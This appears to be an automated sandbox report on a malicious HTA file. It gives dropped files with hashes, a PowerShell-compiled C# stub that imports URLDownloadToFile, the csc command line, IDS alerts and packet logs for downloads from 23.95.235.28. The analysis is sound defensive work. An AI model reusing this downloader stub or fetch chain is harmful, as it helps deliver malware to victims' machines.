                                                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Mar 17 01:41:58 2025, 1st section name ".debug$S"
                                                                                        Category:dropped
                                                                                        Size (bytes):1328
                                                                                        Entropy (8bit):3.9898197455367828
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:HVe9EuZfSWXDfHlHwKEbsmfII+ycuZhNFakSjPNnqSqd:cBjziKPmg1ulFa3JqSK
                                                                                        MD5:4E8CF4DFA7060E65F06674D98030E9B6
                                                                                        SHA1:43A29597650FC765FA56E46D21DB5D40C89EC349
                                                                                        SHA-256:1208987462B6A5B48987C1D634F6419CD0B667BCC9BCD6ED29E19F04CA786AEA
                                                                                        SHA-512:2314AA180FCA699AC6C5933F21B67D5E69958E76C30542ADDF388256C0A880D56120E0CE50194446BFCDD1839669629EB9DCCF03759119739216290D9B113ED4
                                                                                        Malicious:false
                                                                                        Preview:L....}.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP....................GG1.Z.U.N.............4.......C:\Users\user\AppData\Local\Temp\RESEEFD.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.k.g.v.u.r.t.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Users\user\AppData\Roaming\csoss.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):93696
                                                                                        Entropy (8bit):6.859595316455185
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:zAXKONfuoQTvK0BKTBI4LmIK8AfXEQzFgHI5t348YDXe/l5BnHdFU+kWj9gukGrR:VafuoQTvK0BKTBI4LmIK8AfXEQzFgHGj
                                                                                        MD5:567A6B0C68A61B680EA2ABE4CD4A4BF6
                                                                                        SHA1:9B5554EBC8363BC7B0247D92BD399314EC2A6325
                                                                                        SHA-256:3D43A21F33A7589FF3C7782307FF77026F1D224E31D84F785A75138ED219C5A7
                                                                                        SHA-512:A5DB55CD1D60BB917DC4761953E41CB0D357554E9351C92A620B335B883B7228E649F446ACD3B29539BB3D280C41533AB9180A4E7BBB84B88AF9E0C8EEFAE40C
                                                                                        Malicious:false
                                                                                        Preview:...X72SDHLCX..UH.LSGWGXM.GE3SF9X42SDLLCXWRUHALSGWGXMVGE3SF9X.2SDBS.VW.\.`.R..f.%?4eC!)^*U_s'-"-7#r7-a>&)w.6m....>)]=.?^NhLCXWRUH..SG.F[M.)..SF9X42SD.LAY\S.HA(RGWOXMVGE3..8X4.SDL.BXWR.HAlSGWEXMRGE3SF9X22SDLLCXW.THANSGWGXMTG%.SF)X4"SDLLSXWBUHALSGGGXMVGE3SF9Xd.RD.LCXW.TH.ISGWGXMVGE3SF9X42SDL.BX[RUHALSGWGXMVGE3SF9X42SDLLCXWRUHALSGWGXMVGE3SF9X42SDLlCX_RUHALSGWGXM^gE3.F9X42SDLLCXy&005LSG.%YMVgE3S"8X40SDLLCXWRUHALSGwGX-x56A0F9X.7SDL.BXWTUHA*RGWGXMVGE3SF9Xt2S.b>&481UHMLSGW.YMVEE3S*8X42SDLLCXWRUH.LS.WGXMVGE3SF9X42SD..BXWRUH.LSGUG]M*.E3..9X72SD.LC^..UH.LSGWGXMVGE3SF9X42SDLLCXWRUHALSGWGXMVGE3SF9X.O.K...1$..HALSGWFZNRAM;SF9X42SD2LCX.RUH.LSG`GXMsGE3>F9X.2SD2LCX)RUH%LSG%GXM7GE3.F9X[2SD"LCX)RUH_N{XWGRgpGG.sF9R4..7mLCR.SUHE?qGWM.OVGA@pF9R.1SDH?gXWX.LALW4rGXG.BE3WlcX7.EBLLX7oRUBAO.RQGXV|aE1{.9X>2ybLO.MQRUSknSE.NXMRm.@NF9^.pSDF8JXWP.BALWmIEp.VGO.q8*X46xDfn=LWRQcAfq9BGXI}Go.-P9X0.Snn2TXWV~HkJy%W5.AV7F\2F9^..SDFd.XWTUb{L-IWG\O9.E3Y`.b4..DLJCp.RUNAf.G)tXMRkBM`F9\.$-uLLG.Q*UHG?.GWM}.eGE7{.9X>2y.Ld.XWTU`.LSA
                                                                                        Process:C:\Users\user\AppData\Roaming\csoss.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):63822
                                                                                        Entropy (8bit):7.883912543678241
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:8XvTxKrhtlnl6MtPW+ndY7NJIJ4IfkrhW29cRToe/vhJ8UkAq:8fTx4PllM+dumJ4Iak2Oxo+zE1
                                                                                        MD5:349F224257DECA966977066A62BB7BB8
                                                                                        SHA1:DB850D7B43E1BE751573450A62D570FF26A86593
                                                                                        SHA-256:109E7DB35FFBCD28557C12CEA62AAF5115C73349DA3AED014F6B688BBAADDBD7
                                                                                        SHA-512:B43EB613F70549B0CB96D02FE26E8DCF8F2D772202D86859F55476FDAD9A93DB60862E8A781577B64EE5401F321CF60F89023F01DF1178BB8251623D6797DE92
                                                                                        Malicious:false
                                                                                        Preview:EA06..n..G55...D.S(u.F..H..*tz...M.Q.:..sX.......R..( .....gh.8P...._.\..>.(^j.....Z..S^.Uk.9<.E-...Sym.}&....klJ....5..j.^.Z..3.....5n....p@...S(5..N.H..*Tz.<....$.4..F.......Pm.....M..Ffd.Q..R.A..Tb.G..tiMbi"..ju......p.N.6.*$....U).zH.....c(U......1...V..b..9....3...v.&.L&....KY..........*|7z=b[x..3....7...P.p.T..>.....O..I..H..88p.B..8J.......S..T||.p..U.B@.....M.bh.<?.r.)E..:.O>.)....oO..._.\.I....b.Z.T.4....@..D.3.{...s.8'...@.s2...J.8I@........+`....s5.u.W....=.7s.NjSH.vom.P.]z.V.E..h.zob.V..h....i1..'.z.^..Pi.y..X...TY.^.c.M..Z.2.X...UZ.....Th.....E......ey.S)..mF.U....:/^...[bt.u.s^.\*tJ4.X..:. .B.I..!.j=>3q.J..I..f.Oi.z.F.A.\g4*=b.}...2..0.....R.W._...U.KW..(5i...2.Tr........t.m&.G.S.>.,.`.......J.. .*.:.f...7@...B..(..~I-..).}5FUU.Q.........{.....S,...F...T.5{|V.V..cq...i...*P..F.....5./..E...z..5.S(.:.R_|.Pi.......L.3...{.S).[.V...Ph.0......f....i...nP.._mT..&.Z..(..ThTH..eW.q...5..U.P......`.Nb.:.2....(..T.`...~.z.G..0. .B..M'.8...B.B..
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:MSVC .res
                                                                                        Category:dropped
                                                                                        Size (bytes):652
                                                                                        Entropy (8bit):3.108912663958458
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHak7YnqqjPN5Dlq5J:+RI+ycuZhNFakSjPNnqX
                                                                                        MD5:1DABFAB2474731E05AE055104EC21DDC
                                                                                        SHA1:C4F51B5C7528143A3831B8687B0AB8DF2E20BC17
                                                                                        SHA-256:8D5C9E5A547FE083D1B39F1B3778D45350CBB1EDBC8FCAF64C148ACAF2A988A1
                                                                                        SHA-512:CBB04607928B924A7AEF70934A414C856B564C5F0D0347C20F266C6A19EDEBFB6C52CD43F97EDC171DB46EA0C4010087838A6EF147EB1C6ADFF7C9A0F93A2F27
                                                                                        Malicious:false
                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.k.g.v.u.r.t.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.k.g.v.u.r.t.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (359)
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):3.641187155285666
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:V/DsYLDS81zui0IdMGlhJhQXReKJ8SRHy4H5RTBN/WSKQy:V/DTLDfuijbOXfHb7u5Qy
                                                                                        MD5:BF77F720153047F3B7F3F9858EA6EC5E
                                                                                        SHA1:1E0701221710CC1D2690A07D7BD4797B05295DE9
                                                                                        SHA-256:A3755788D8B3CFA0B79EEFDE4CE183F038843A8A7EAE4832A756F3351539BE5B
                                                                                        SHA-512:642ADAEBF0F7CF7E176F5EF2186D0E28D244877D1EA496D231EE968D71DD0A377D1F08E0CE1ED7FA92D93F9600286371515EBE6D38DEA20919BBD44FC49AD219
                                                                                        Malicious:false
                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace deKyoNd.{. public class rOlSy. {. [DllImport("urlMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr I,string ayRUTt,string quNdpSq,uint BI,IntPtr ohso);.. }..}.
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category: dropped
Size (bytes): 369
Entropy (8bit): 5.255618431013431
Encrypted: false
SSDEEP: 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fWzxs7+AEszIwkn23fFyA:p37Lvkmb6KRfOWZEifYA
MD5: DD4CFB6A25B80E9ECE76EBC816DA0CDE
SHA1: 6875919735D47358E6B556B6F9D4F4D48FDD4ECA
SHA-256: 9553E7A29771706FC7EC064C80F2A78D3A81EDDB538F7184153658140C9EC1FD
SHA-512: 4FA7DC8E45A61B34134245F21624071271EB7DADE4BDFF54C869D8D8183BE9D58EB63F8B5EB4A9B9B02AF3B004A4C22CF00C3531381EA24743B8D3E28F9D545C
Malicious: true
Preview (csc.exe command-line file; the leading byte-order mark is rendered as '.' in the report):
    /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.0.cs"
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3072
Entropy (8bit): 2.8065814665091904
Encrypted: false
SSDEEP: 24:etGS29PBu5exl8KVJkZeCRWfqUxftkZfn1BjcUWI+ycuZhNFakSjPNnq:62msx+KvMuqUx+Jn1BA31ulFa3Jq
MD5: 0815E50FD83A37B5443F0C5523AF1381
SHA1: 410CEE29009AE1A12A2190E603520BE44216D5B7
SHA-256: F90B9696EE98116C88D8EAB359693C56E1D301381AB1F19993CFE819B5BCCE24
SHA-512: 7B30A6853A8289CD4B957CC4E07E3E8BE6F89A16E33447AC893E0565A5DABF43A2C268EE97A86291B50D4CAFFE9D9D6BDD9789DE9BEDD943A5462885E7B1BEA9
Malicious: true
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
Category: modified
Size (bytes): 867
Entropy (8bit): 5.31284654109926
Encrypted: false
SSDEEP: 24:KJBqd3ka6KRfPEifiKax5DqBVKVrdFAMBJTH:Cika6CPEuiK2DcVKdBJj
MD5: 695C7321E5A4AFEBA80ED1A2B49E744A
SHA1: 8AEA579D11678872B4062FB4291C103DD619EA28
SHA-256: 540FE53DEBB4BE835ED85C20BDBFFF9E6693D06DEF632F3C9B264C3BE800BE44
SHA-512: E965C3F59AB085A33EE45EB1A08C21BD595FE5204B3D6FF68872C7D8FAF1983412C9E01F6DAF2FD31DE7504539B2B6FA2E138620271080FFE6438CE32DD5DB5B
Malicious: false
Preview (csc.exe console output; BOM and line terminators are rendered as '.' in the report, line breaks restored here):
    C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.0.cs"

    Microsoft (R) Visual C# Compiler version 4.8.4084.0
    for C# 5
    Copyright (C) Microsoft Corporation. All rights reserved.

    This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 980992
Entropy (8bit): 6.875555651887693
Encrypted: false
SSDEEP: 24576:/u6J33O0c+JY5UZ+XC0kGso6Fa4aL34eprdWY:Ju0c++OCvkGs9Fa4aL341Y
MD5: 54DE0C8E192E7BC71B6D284FFF136296
SHA1: F2AB671CBF4229C9C7EA12F01B148E470B6621E7
SHA-256: D274A8FCA173BF675C950AAD9A3D09EF48DCE2522756BC6BEBA0E08DB8DCFC90
SHA-512: 5EE16D7EB2ED2B7CF85225ACC2FDB43144581CA54BB171FE129B5F2ABF5E067D1BFE9472616714BB869C7AC3765CCF22873F56F116BBFA6F1CEE37863D35F258
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 83%
File type: HTML document, ASCII text, with very long lines (15812), with CRLF line terminators
Entropy (8bit): 2.0916152278723783
TrID:
• HyperText Markup Language (15015/1) 100.00%
File name: needagoodplanforsuccesstogetbackbest.hta
File size: 15'981 bytes
MD5: 69de66532cc4a0f299ce46f49e150555
SHA1: 84d95b6fb113d7751509702c72f017875d4aefd8
SHA256: 17bf3cc6ffe8c17c0d724acadc503305ae2fa70ef5571d2303f5c894538a1045
SHA512: 285d0be0eb4f938b0c738fb90e1c267a71ff9179fb8f81f5209421287b4ff41bb56a7afe99a0164cb3a5fb89b5d0895d4d8f9b716df52a88c6f462bc04bb761a
SSDEEP: 48:3d7FdzH7F7w8zlSYb9AnIsfQ+x99DdeaApCHUFdot7FQ+7FwKpJ4+z397F5PG:DlRXlXe/Q+xf8amCHUo9wgj5+
TLSH: 5E72955A5F2CBDC8C3E0FC3989ED6AC1745D137E09C25A01794EB0EE6FDA7149AE8241
File Content Preview (CRLF line terminators are rendered as '..' in the report, line breaks restored here; the remainder of the preview after DIM is a run of non-printable bytes rendered as '.'):
    <!DOCTYPE html>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
    <html>
    <body>
    <sCripT TYPE="TexT/vBSCRIpT">
    DIM
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-17T01:19:04.147044+0100 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 23.95.235.28 | 80 | 192.168.2.4 | 49724 | TCP
2025-03-17T01:19:04.240021+0100 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 23.95.235.28 | 80 | 192.168.2.4 | 49724 | TCP
2025-03-17T01:19:11.071326+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49725 | 193.122.130.0 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Mar 17, 2025 01:19:04.327143908 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.327156067 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327171087 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.327203035 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.328114033 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.328159094 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411513090 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411535978 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411549091 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411561966 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411573887 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411585093 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411602020 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411612988 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411624908 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411637068 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411653042 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411653996 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411663055 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411664963 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411679983 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411691904 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411715984 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411742926 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411753893 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411762953 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411775112 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411786079 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411799908 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411799908 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411818027 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411940098 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411952019 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411967993 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412004948 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412014961 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412014961 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412015915 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412028074 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412039042 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412046909 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412071943 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412075996 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412086010 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412098885 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412113905 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412153959 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412256956 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412270069 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412285089 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412316084 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412332058 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412360907 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412373066 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412384033 CET804972423.95.235.28192.168.2.4